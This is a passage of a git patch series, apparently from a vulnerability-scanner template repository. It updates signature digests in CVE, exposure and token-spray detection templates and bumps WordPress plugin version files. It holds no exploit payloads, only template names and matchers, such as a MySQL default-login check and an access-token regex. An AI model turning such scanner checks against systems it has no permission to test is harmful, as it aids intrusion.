490a0046304402205ac7cfbfff322a01bde1ba986c6cbb110f2bb3e239d6f114bea52762537c040102200c7d52565cd32eb1d8ef46a60bc821bcf76e8324527a861ac6919a3df5782410:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-29153.yaml b/http/cves/2022/CVE-2022-29153.yaml index 3f5acccdfa..24d7b7c3f9 100644 --- a/http/cves/2022/CVE-2022-29153.yaml +++ b/http/cves/2022/CVE-2022-29153.yaml @@ -59,4 +59,4 @@ http: - type: status status: - 400 -# digest: 4a0a00473045022100bb32c3bf98b557717dbf468ff1f2e419a142ec0684d7827cec4e3211ff8c9f06022067d21429a6cefdba2eb1b4f236ac351262ab0ecc15e321634a6f2819b8478bc7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ea0f8cb9d0d00089e95ed2ee6c9e52a7a0eb41d6bd10a23c290bedbd627f57410220558e5e7400950e3a67cd10a0433ae060ff041a21031995cc4b7aeed642d55c0c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-38131.yaml b/http/cves/2022/CVE-2022-38131.yaml index c195e55da3..d40544cf15 100644 --- a/http/cves/2022/CVE-2022-38131.yaml +++ b/http/cves/2022/CVE-2022-38131.yaml @@ -52,4 +52,4 @@ http: - type: status status: - 307 -# digest: 4a0a00473045022100ed4b548010525ed60d2e797a65bf53c3714ee6498f996821172ef5056570d35202207c5784e1c9f550732f087b7a65a95c84bbcd26fd89db94ae6f8ed8bf59845a79:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ba779a786ac8f0ec80f366fd3993fefb8a6192ee465d8fae07b58c43c80776ac022100d7a59700688a2c2e4fe2dfd59fe4c29ffd5540ca1a457010a51fc8a94a4941e4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-24044.yaml b/http/cves/2023/CVE-2023-24044.yaml index 7f24971864..bc7b27b1ab 100644 --- a/http/cves/2023/CVE-2023-24044.yaml +++ b/http/cves/2023/CVE-2023-24044.yaml @@ -58,4 +58,4 @@ http: - type: status status: - 303 -# digest: 4a0a00473045022100e4012229519fa2761db92e39507fe2caf668a18dac3214d7ee7a2bddb162a488022026a141f13c66eb66e2170134f958feb2a3c58097808460c971629b4a9b26bf46:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502207a6df02ac9d11efd62d80a2820957c13fb4737748b3fa51ad0b4c42474a163490221009b2beb2b2c262f1040371ed0b5ed99ed68bb59f1bd4c1732ef86e1d4c64aa43b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-34362.yaml b/http/cves/2023/CVE-2023-34362.yaml index 3dcb6a1b1f..3223dd3e19 100644 --- a/http/cves/2023/CVE-2023-34362.yaml +++ b/http/cves/2023/CVE-2023-34362.yaml @@ -131,4 +131,4 @@ http: regex: - '"access_token":"([^"]+)"' part: body -# digest: 4b0a00483046022100f72d08a9b9e841e0d447155a1414f61d5ae334e47b039783b1c835489d799ab2022100952cf077ba2d49d2a333ddb774a88cc81eaba6a5ac76e2ed85bdfe6974a14999:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210080d4b0cc8f0191f0dbb9a9ca19e57130b525b30b1b9422119cad243e8515532f02204ed5ee10420e38ff887ade4d7e6c615071e4494c598470bfc0be826c7382b2ef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposures/backups/zip-backup-files.yaml b/http/exposures/backups/zip-backup-files.yaml index fa91308566..d42c6d9e7d 100644 --- a/http/exposures/backups/zip-backup-files.yaml +++ b/http/exposures/backups/zip-backup-files.yaml @@ -127,4 +127,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100a51f2952c9c24769da7d9ad5fa3f8ad2c01a800385052b494e5cf8b8cd2b0b2002210086e92de1a4bcde1fb7758917220ed3470e42201e239106f349d60c0e28d6452b:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402205696de65d879afa5be79128a917c054d5544cfa62ea8bd1649afdecf69120b3e022021f382f9585b04c1c49621d928b875dc7b74032302d793f15b6a5da468b5214b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/token-spray/api-scraperbox.yaml b/http/token-spray/api-scraperbox.yaml index 013f8137fb..318b3f3587 100644 --- a/http/token-spray/api-scraperbox.yaml +++ b/http/token-spray/api-scraperbox.yaml @@ -29,5 +29,4 @@ http: part: body words: - '<h1> Interactsh Server </h1>' - -# digest: 4a0a0047304502207f36a4754fda5d47376179286a5929f95ecb39833d01276df125df4cbd5b3712022100e471d820cf8e65b92617364b2126738d2dcefb072e6073ae15af81d922a347f2:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a004830460221008ff8292cc353ebf7a99f02309204258ba687b09db0ff39799aa77da0c6ad4f34022100a4bd8632ff2ac574ed802106daac16c08abc2c64fad8667c3118a9a2dc800814:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/token-spray/api-scrapestack.yaml b/http/token-spray/api-scrapestack.yaml index b1c3fe2098..6714c0af40 100644 --- a/http/token-spray/api-scrapestack.yaml +++ b/http/token-spray/api-scrapestack.yaml @@ -24,5 +24,4 @@ http: part: body words: - '<h1> Interactsh Server </h1>' - -# digest: 4b0a00483046022100eac15c431eb927c4e320c9e035ceca60c466be6beca8cf895164f574c60216a1022100ff782e772cac1246805653374e5809e611e222b90840b47d3ff64ebd78365124:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022033ed1664534d5458205e2d36fb5a0a8ce3863a8b777d79bc29619e16b03e7d4402201c35d00f31dd314c4cb4ebe3d804383aa611d17be56633b54140fd585867af70:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/token-spray/api-zenrows.yaml b/http/token-spray/api-zenrows.yaml index a8e192563d..c9289e1690 100644 --- a/http/token-spray/api-zenrows.yaml +++ b/http/token-spray/api-zenrows.yaml @@ -24,5 +24,4 @@ http: part: body words: - '<h1> Interactsh Server </h1>' - -# digest: 490a00463044022053400d85ec2ff13f0c35b64bcadd50ad94e1a5dd83e8ee17fc28a0fba7da62cc022032c0210f12b83c7ebe8bd917a35c833b82ad629aa4e67377438baa7f4b673765:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450221009e92d7a356bf92d7054bc865e99cd8c110e8438dca63409930cd1434fdc5eaf902204067cebab007cb13231808d9055968345729738ebc1ce6bdd730334efd490e6a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/other/bitrix-open-redirect.yaml b/http/vulnerabilities/other/bitrix-open-redirect.yaml index 305e6332f6..59faf0edbb 100644 --- a/http/vulnerabilities/other/bitrix-open-redirect.yaml +++ b/http/vulnerabilities/other/bitrix-open-redirect.yaml @@ -51,4 +51,4 @@ http: status: - 302 - 301 -# digest: 4a0a00473045022076898c7e94f9fa54a0043643d8984c844200ec0d3a8a829faa58e30e382dc635022100d0b04f2037e4ef5eb563a23e63788d8c85ca17f7cbe4760666895f1383585f12:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100dfd3e68519f762f268c33ce8cb941615b708185ed686d6e90b502b8cf001b52a0221008e2b0be24e26bbeefb71838e218ec30312a663dd7a6aba5967d102a1d5f6f2ee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/javascript/enumeration/mysql/mysql-default-login.yaml b/javascript/enumeration/mysql/mysql-default-login.yaml index c6af725762..a15e0d66fe 100644 --- a/javascript/enumeration/mysql/mysql-default-login.yaml +++ b/javascript/enumeration/mysql/mysql-default-login.yaml @@ -46,4 +46,4 @@ javascript: - "response == true" - "success == true" condition: and -# digest: 4a0a0047304502203b16c0831093780883fc023d676c54ec2533d4ac05f2071bea5d68c33ca8b63002210092abea71a11967719f8565e6fc01a8e49569bd807e9cc5b80192f8011c456d0f:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502207adcfc24d9e3c74929abb00b45b3f42e30ade1edda76da0e9768605cf7e06228022100fc831a5449c73d201e21efe1a73471db66ad40c120568f7445334832ba8a16c8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From ccde2920ce6fdf71e027031a185969cb12af17e5 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Sat, 27 Jul 2024 00:19:20 +0000 Subject: [PATCH 1683/1841] Auto WordPress Plugins Update [Sat Jul 27 00:19:20 UTC 2024] :robot: --- helpers/wordpress/plugins/coblocks.txt | 2 +- helpers/wordpress/plugins/woocommerce.txt | 2 +- http/technologies/wordpress/plugins/ad-inserter.yaml | 1 - http/technologies/wordpress/plugins/add-to-any.yaml | 1 - http/technologies/wordpress/plugins/admin-menu-editor.yaml | 1 - http/technologies/wordpress/plugins/advanced-custom-fields.yaml | 1 - http/technologies/wordpress/plugins/akismet.yaml | 1 - http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml | 1 - .../technologies/wordpress/plugins/all-in-one-wp-migration.yaml | 1 - .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml | 1 - http/technologies/wordpress/plugins/amp.yaml | 1 - http/technologies/wordpress/plugins/antispam-bee.yaml | 1 - http/technologies/wordpress/plugins/astra-sites.yaml | 1 - http/technologies/wordpress/plugins/autoptimize.yaml | 1 - http/technologies/wordpress/plugins/backwpup.yaml | 1 - http/technologies/wordpress/plugins/better-search-replace.yaml | 1 - http/technologies/wordpress/plugins/better-wp-security.yaml | 1 - .../wordpress/plugins/black-studio-tinymce-widget.yaml | 1 - http/technologies/wordpress/plugins/breadcrumb-navxt.yaml | 1 - http/technologies/wordpress/plugins/breeze.yaml | 1 - http/technologies/wordpress/plugins/broken-link-checker.yaml | 1 - http/technologies/wordpress/plugins/chaty.yaml | 1 - .../wordpress/plugins/child-theme-configurator.yaml | 1 - http/technologies/wordpress/plugins/classic-editor.yaml | 1 - http/technologies/wordpress/plugins/classic-widgets.yaml | 1 - .../wordpress/plugins/click-to-chat-for-whatsapp.yaml | 1 - http/technologies/wordpress/plugins/cmb2.yaml | 1 - http/technologies/wordpress/plugins/coblocks.yaml | 1 - http/technologies/wordpress/plugins/code-snippets.yaml | 1 - http/technologies/wordpress/plugins/coming-soon.yaml | 1 - http/technologies/wordpress/plugins/complianz-gdpr.yaml | 1 - .../technologies/wordpress/plugins/contact-form-7-honeypot.yaml | 1 - http/technologies/wordpress/plugins/contact-form-7.yaml | 1 - http/technologies/wordpress/plugins/contact-form-cfdb7.yaml | 1 - http/technologies/wordpress/plugins/cookie-law-info.yaml | 1 - http/technologies/wordpress/plugins/cookie-notice.yaml | 1 - http/technologies/wordpress/plugins/copy-delete-posts.yaml | 1 - http/technologies/wordpress/plugins/creame-whatsapp-me.yaml | 1 - .../wordpress/plugins/creative-mail-by-constant-contact.yaml | 1 - http/technologies/wordpress/plugins/custom-css-js.yaml | 1 - http/technologies/wordpress/plugins/custom-fonts.yaml | 1 - http/technologies/wordpress/plugins/custom-post-type-ui.yaml | 1 - http/technologies/wordpress/plugins/disable-comments.yaml | 1 - http/technologies/wordpress/plugins/disable-gutenberg.yaml | 1 - http/technologies/wordpress/plugins/duplicate-page.yaml | 1 - http/technologies/wordpress/plugins/duplicate-post.yaml | 1 - http/technologies/wordpress/plugins/duplicator.yaml | 1 - .../wordpress/plugins/duracelltomi-google-tag-manager.yaml | 1 - http/technologies/wordpress/plugins/easy-table-of-contents.yaml | 1 - http/technologies/wordpress/plugins/easy-wp-smtp.yaml | 1 - http/technologies/wordpress/plugins/elementor.yaml | 1 - http/technologies/wordpress/plugins/elementskit-lite.yaml | 1 - http/technologies/wordpress/plugins/enable-media-replace.yaml | 1 - http/technologies/wordpress/plugins/envato-elements.yaml | 1 - .../wordpress/plugins/essential-addons-for-elementor-lite.yaml | 1 - http/technologies/wordpress/plugins/ewww-image-optimizer.yaml | 1 - .../wordpress/plugins/facebook-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/fast-indexing-api.yaml | 1 - .../wordpress/plugins/favicon-by-realfavicongenerator.yaml | 1 - http/technologies/wordpress/plugins/flamingo.yaml | 1 - http/technologies/wordpress/plugins/fluent-smtp.yaml | 1 - http/technologies/wordpress/plugins/fluentform.yaml | 1 - http/technologies/wordpress/plugins/font-awesome.yaml | 1 - .../wordpress/plugins/force-regenerate-thumbnails.yaml | 1 - http/technologies/wordpress/plugins/formidable.yaml | 1 - http/technologies/wordpress/plugins/forminator.yaml | 1 - http/technologies/wordpress/plugins/ga-google-analytics.yaml | 1 - http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 1 - .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml | 1 - .../wordpress/plugins/google-analytics-for-wordpress.yaml | 1 - .../technologies/wordpress/plugins/google-listings-and-ads.yaml | 1 - http/technologies/wordpress/plugins/google-site-kit.yaml | 1 - .../wordpress/plugins/google-sitemap-generator.yaml | 1 - http/technologies/wordpress/plugins/gtranslate.yaml | 1 - http/technologies/wordpress/plugins/gutenberg.yaml | 1 - http/technologies/wordpress/plugins/happy-elementor-addons.yaml | 1 - .../wordpress/plugins/header-footer-code-manager.yaml | 1 - .../technologies/wordpress/plugins/header-footer-elementor.yaml | 1 - http/technologies/wordpress/plugins/header-footer.yaml | 1 - http/technologies/wordpress/plugins/health-check.yaml | 1 - http/technologies/wordpress/plugins/hello-dolly.yaml | 1 - http/technologies/wordpress/plugins/host-webfonts-local.yaml | 1 - http/technologies/wordpress/plugins/hostinger.yaml | 1 - http/technologies/wordpress/plugins/image-optimization.yaml | 1 - http/technologies/wordpress/plugins/imagify.yaml | 1 - http/technologies/wordpress/plugins/imsanity.yaml | 1 - .../wordpress/plugins/insert-headers-and-footers.yaml | 1 - http/technologies/wordpress/plugins/instagram-feed.yaml | 1 - .../wordpress/plugins/intuitive-custom-post-order.yaml | 1 - http/technologies/wordpress/plugins/jetpack-boost.yaml | 1 - http/technologies/wordpress/plugins/jetpack.yaml | 1 - http/technologies/wordpress/plugins/kadence-blocks.yaml | 1 - http/technologies/wordpress/plugins/kirki.yaml | 1 - http/technologies/wordpress/plugins/leadin.yaml | 1 - .../wordpress/plugins/limit-login-attempts-reloaded.yaml | 1 - http/technologies/wordpress/plugins/limit-login-attempts.yaml | 1 - http/technologies/wordpress/plugins/litespeed-cache.yaml | 1 - http/technologies/wordpress/plugins/loco-translate.yaml | 1 - http/technologies/wordpress/plugins/loginizer.yaml | 1 - .../wordpress/plugins/mailchimp-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/mailchimp-for-wp.yaml | 1 - http/technologies/wordpress/plugins/mailpoet.yaml | 1 - http/technologies/wordpress/plugins/maintenance.yaml | 1 - http/technologies/wordpress/plugins/mainwp-child.yaml | 1 - http/technologies/wordpress/plugins/malcare-security.yaml | 1 - http/technologies/wordpress/plugins/megamenu.yaml | 1 - http/technologies/wordpress/plugins/members.yaml | 1 - http/technologies/wordpress/plugins/meta-box.yaml | 1 - http/technologies/wordpress/plugins/metform.yaml | 1 - http/technologies/wordpress/plugins/ml-slider.yaml | 1 - http/technologies/wordpress/plugins/newsletter.yaml | 1 - .../wordpress/plugins/nextend-facebook-connect.yaml | 1 - http/technologies/wordpress/plugins/nextgen-gallery.yaml | 1 - http/technologies/wordpress/plugins/ninja-forms.yaml | 1 - http/technologies/wordpress/plugins/ocean-extra.yaml | 1 - .../technologies/wordpress/plugins/official-facebook-pixel.yaml | 1 - http/technologies/wordpress/plugins/one-click-demo-import.yaml | 1 - http/technologies/wordpress/plugins/optinmonster.yaml | 1 - http/technologies/wordpress/plugins/otter-blocks.yaml | 1 - http/technologies/wordpress/plugins/password-protected.yaml | 1 - http/technologies/wordpress/plugins/pdf-embedder.yaml | 1 - .../wordpress/plugins/pinterest-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/pixelyoursite.yaml | 1 - http/technologies/wordpress/plugins/polylang.yaml | 1 - http/technologies/wordpress/plugins/popup-maker.yaml | 1 - http/technologies/wordpress/plugins/post-smtp.yaml | 1 - http/technologies/wordpress/plugins/post-types-order.yaml | 1 - .../wordpress/plugins/premium-addons-for-elementor.yaml | 1 - http/technologies/wordpress/plugins/pretty-link.yaml | 1 - http/technologies/wordpress/plugins/really-simple-captcha.yaml | 1 - http/technologies/wordpress/plugins/really-simple-ssl.yaml | 1 - http/technologies/wordpress/plugins/redirection.yaml | 1 - http/technologies/wordpress/plugins/redux-framework.yaml | 1 - http/technologies/wordpress/plugins/regenerate-thumbnails.yaml | 1 - http/technologies/wordpress/plugins/royal-elementor-addons.yaml | 1 - http/technologies/wordpress/plugins/safe-svg.yaml | 1 - http/technologies/wordpress/plugins/seo-by-rank-math.yaml | 1 - http/technologies/wordpress/plugins/sg-cachepress.yaml | 1 - http/technologies/wordpress/plugins/sg-security.yaml | 1 - http/technologies/wordpress/plugins/shortcodes-ultimate.yaml | 1 - .../wordpress/plugins/shortpixel-image-optimiser.yaml | 1 - .../wordpress/plugins/simple-custom-post-order.yaml | 1 - http/technologies/wordpress/plugins/siteguard.yaml | 1 - http/technologies/wordpress/plugins/siteorigin-panels.yaml | 1 - http/technologies/wordpress/plugins/smart-slider-3.yaml | 1 - http/technologies/wordpress/plugins/so-widgets-bundle.yaml | 1 - .../wordpress/plugins/sticky-header-effects-for-elementor.yaml | 1 - .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml | 1 - http/technologies/wordpress/plugins/sucuri-scanner.yaml | 1 - http/technologies/wordpress/plugins/table-of-contents-plus.yaml | 1 - http/technologies/wordpress/plugins/tablepress.yaml | 1 - http/technologies/wordpress/plugins/taxonomy-terms-order.yaml | 1 - http/technologies/wordpress/plugins/templately.yaml | 1 - http/technologies/wordpress/plugins/the-events-calendar.yaml | 1 - http/technologies/wordpress/plugins/tinymce-advanced.yaml | 1 - .../wordpress/plugins/translatepress-multilingual.yaml | 1 - .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml | 1 - .../technologies/wordpress/plugins/under-construction-page.yaml | 1 - http/technologies/wordpress/plugins/updraftplus.yaml | 1 - http/technologies/wordpress/plugins/user-role-editor.yaml | 1 - http/technologies/wordpress/plugins/w3-total-cache.yaml | 1 - .../wordpress/plugins/webp-converter-for-media.yaml | 1 - http/technologies/wordpress/plugins/webp-express.yaml | 1 - .../wordpress/plugins/widget-importer-exporter.yaml | 1 - .../wordpress/plugins/woo-cart-abandonment-recovery.yaml | 1 - .../wordpress/plugins/woo-checkout-field-editor-pro.yaml | 1 - http/technologies/wordpress/plugins/woo-variation-swatches.yaml | 1 - .../wordpress/plugins/woocommerce-gateway-stripe.yaml | 1 - .../wordpress/plugins/woocommerce-legacy-rest-api.yaml | 1 - http/technologies/wordpress/plugins/woocommerce-payments.yaml | 1 - .../wordpress/plugins/woocommerce-paypal-payments.yaml | 1 - .../plugins/woocommerce-pdf-invoices-packing-slips.yaml | 1 - http/technologies/wordpress/plugins/woocommerce-services.yaml | 1 - http/technologies/wordpress/plugins/woocommerce.yaml | 1 - http/technologies/wordpress/plugins/wordfence.yaml | 1 - http/technologies/wordpress/plugins/wordpress-importer.yaml | 1 - http/technologies/wordpress/plugins/wordpress-seo.yaml | 1 - http/technologies/wordpress/plugins/worker.yaml | 1 - http/technologies/wordpress/plugins/wp-crontrol.yaml | 1 - http/technologies/wordpress/plugins/wp-fastest-cache.yaml | 1 - http/technologies/wordpress/plugins/wp-file-manager.yaml | 1 - http/technologies/wordpress/plugins/wp-google-maps.yaml | 1 - http/technologies/wordpress/plugins/wp-mail-smtp.yaml | 1 - http/technologies/wordpress/plugins/wp-maintenance-mode.yaml | 1 - http/technologies/wordpress/plugins/wp-migrate-db.yaml | 1 - http/technologies/wordpress/plugins/wp-multibyte-patch.yaml | 1 - http/technologies/wordpress/plugins/wp-optimize.yaml | 1 - http/technologies/wordpress/plugins/wp-pagenavi.yaml | 1 - http/technologies/wordpress/plugins/wp-reset.yaml | 1 - .../wordpress/plugins/wp-reviews-plugin-for-google.yaml | 1 - http/technologies/wordpress/plugins/wp-rollback.yaml | 1 - http/technologies/wordpress/plugins/wp-seopress.yaml | 1 - http/technologies/wordpress/plugins/wp-sitemap-page.yaml | 1 - http/technologies/wordpress/plugins/wp-smushit.yaml | 1 - http/technologies/wordpress/plugins/wp-statistics.yaml | 1 - http/technologies/wordpress/plugins/wp-super-cache.yaml | 1 - http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml | 1 - http/technologies/wordpress/plugins/wpcf7-redirect.yaml | 1 - http/technologies/wordpress/plugins/wpforms-lite.yaml | 1 - http/technologies/wordpress/plugins/wps-hide-login.yaml | 1 - http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml | 1 - .../wordpress/plugins/yith-woocommerce-wishlist.yaml | 1 - 202 files changed, 2 insertions(+), 202 deletions(-) diff --git a/helpers/wordpress/plugins/coblocks.txt b/helpers/wordpress/plugins/coblocks.txt index ffbbb67770..85b3175412 100644 --- a/helpers/wordpress/plugins/coblocks.txt +++ b/helpers/wordpress/plugins/coblocks.txt @@ -1 +1 @@ -3.1.12 \ No newline at end of file +3.1.13 \ No newline at end of file diff --git a/helpers/wordpress/plugins/woocommerce.txt b/helpers/wordpress/plugins/woocommerce.txt index 80af6f9e82..bf53ea8736 100644 --- a/helpers/wordpress/plugins/woocommerce.txt +++ b/helpers/wordpress/plugins/woocommerce.txt @@ -1 +1 @@ -9.1.2 \ No newline at end of file +9.1.4 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml index b2e08a74d6..3fd2256749 100644 --- a/http/technologies/wordpress/plugins/ad-inserter.yaml +++ b/http/technologies/wordpress/plugins/ad-inserter.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b1c68b8af98e014b2d4e14f04ba6fb5acdb406b596a77af0e42393355fc5d895022100db0bd681508d4d8d5195326707226b1ba929539a12de1480c1c68fc438a64bc3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml index c68922959f..6a0d344b63 100644 --- a/http/technologies/wordpress/plugins/add-to-any.yaml +++ b/http/technologies/wordpress/plugins/add-to-any.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a661df0a3a3552b34fd4e947ce54e43eb5a4f1fd4ec97affdf7ba894679e69dd022021f8cafa80b915b41cb56b414589494ec752940df50b8b740a325e9db29b9949:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml index b0f6c77cf2..6fb5080bc8 100644 --- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml +++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210093b12da7d556ed6d63b60ad4b364a8c412a4ccc726eb75ae9530c874a50a87bc0221009dcc62d10d070d5b4116343d0acdf74c09a1f496b9626ddbbfe11c7e31e38045:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index ff25720b33..cddbb4bb2e 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022049f001db78abc170e62cb64811f3332f24cfe2d39c392938979e754d7a12d5b102202069b0801f78444da29872d8c47650fc1dc8f440b235e98b2483b93fd6899267:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml index adf20b4657..6f253f9f55 100644 --- a/http/technologies/wordpress/plugins/akismet.yaml +++ b/http/technologies/wordpress/plugins/akismet.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f371a69481a6db215e99952e9f77a2d6ae6a65e7307dc30136da4349d6a666a50220466ba71fe493efba912e584ee30fb618c1c5612b72f2fae8a50d503a70c3b596:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index daa1fb1b23..fe45de4d04 100644 --- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c655351774a39087f7f8ccddf16e2a0dcc60305597568de960a9d91acc33ad0c022100be4771aee2546d029a3e6d4d335db7fce18c0e64210f298a8b41b1e4dc994303:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index cd7ae034ec..69e425f446 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100aa4ff1cf3dd97b88b04c2ac60a4b2eb609d39e9d75ea1b171aabffa7e832ceb00220143642b4453f9a05a4b4fc89b6dfcb1047e19dee585643f02755cb8499c636f0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index e8e8474ed0..9c07c65e4e 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220728d3b177b10f4c5275d4584e4961f8c246b8cb3a8cfdc8da72ffd7a43f94b8c0221009b8fc8003e2cfbf4fa37b5ca4865fa511a5cf083f7bc404bd322a2a8f951c3b7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml index 86a0addf59..92c8f5656e 100644 --- a/http/technologies/wordpress/plugins/amp.yaml +++ b/http/technologies/wordpress/plugins/amp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402204fbc3803494e9a7b475a77a45bf7ca1c86bc2f111da9ac36079f12d06347c7810220097b6e5781450c03c2d4b189794a4ea20be6e41deb2292755072a42d8feef0b2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml index 13dc5c164e..70975a19a1 100644 --- a/http/technologies/wordpress/plugins/antispam-bee.yaml +++ b/http/technologies/wordpress/plugins/antispam-bee.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100aae7614c855c62abcd20b4cb76677c622f5f869bfcb31fbbf81c384af662b7c0022100eeb9a61ce85f49fe4501f690bbeb24f0897bc21df473928155fcd1318aee82a7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml index 3d1c09d150..fd7e3e99dd 100644 --- a/http/technologies/wordpress/plugins/astra-sites.yaml +++ b/http/technologies/wordpress/plugins/astra-sites.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022043a38d16e1c77394c2fb90547b6c9d24baba7a502741d8efdd7f85bf73bcb8f2022100e979c7d4b25a1766231589c66f187281b7c7acde317ecbc36316ef1586ac9dd5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml index af62faa260..18f2a2ae84 100644 --- a/http/technologies/wordpress/plugins/autoptimize.yaml +++ b/http/technologies/wordpress/plugins/autoptimize.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402206043e55f20bc894db341be3bdeb1e8cf3a4cba09addec5f5756d3a7509f2cf07022036761eacf364b0adcf7d1ed97c26c0097e95987d1ec977c800a70a254cc2d007:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml index fc55edfaca..11cb41fb2c 100644 --- a/http/technologies/wordpress/plugins/backwpup.yaml +++ b/http/technologies/wordpress/plugins/backwpup.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402203c51770a70ed90157dfc674724337843177faaeaf5b584357dce16e29e3ccf5e0220707d283549af78b4d82308e48db9679c6e6ce1e3ca78d03c631a59084f49572e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git 